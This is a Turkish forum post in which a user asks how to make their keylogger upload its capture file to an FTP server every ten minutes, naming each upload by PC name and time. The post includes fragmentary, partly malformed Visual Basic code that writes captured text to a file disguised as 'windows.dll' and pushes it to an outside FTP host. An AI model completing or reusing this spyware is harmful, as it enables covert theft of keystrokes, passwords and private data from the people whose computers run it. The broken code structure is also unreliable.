ftp keylogger

gowand
Çırak
slm benim yaptıgım keylogger de ftp ye bir defa upload ediyor ben 10dk da bir ve çalıştığı pcnin saatini windows.dll+saat+pcadı olarak kaydedtmesini istiyorum yani dosyanın normal adi windows.dll ama her on dakikada bir
pc adı11:00windows.dll
pcadı11:10windows.dll
pcad11:20windows.dll
boyle kaydetmesini istiyorum nasıl yapabilirim bunu şimdiden teşekkurler


Private Sub Command3_Click()
Form2.Show

End Sub

Private Sub Form_Load()

Inet1.AccessType = icUseDefault
Inet1.Protocol = icFTP
Inet1.RemoteHost = "ftp.cwahi.net"
Inet1.RemotePort = "21"
Inet1.Password = "sıfre"
Inet1.UserName = "k.adi"
Inet1.RequestTimeout = "60"Timer3.Interval = 60000 ' 1 dk

Private Sub Timer2_Timer()
On Error Resume Next
Text2.Text = "e:\windows.dll"
Open Text2.Text For Output As #1
Print #1, Text1.Text;
Close #1

End SubPrivate Sub Timer3_Timer()
If Label1.Caption = 60 Then
'24 X 60 = 1440
'24 saat olmuştur kodu yazabiliriz
Else:
Label1.Caption = Label1.Caption + 1
' Her bir dakikada 1 arttıracak taa ki 24 saat oluncaya kadar
End If

End Sub

Private Sub Timer4_Timer()
If Label1.Caption = 3 Then
Form1.Inet1.Execute , "put e:\windows.dll windows.dll"

End If


End Sub
 
Üst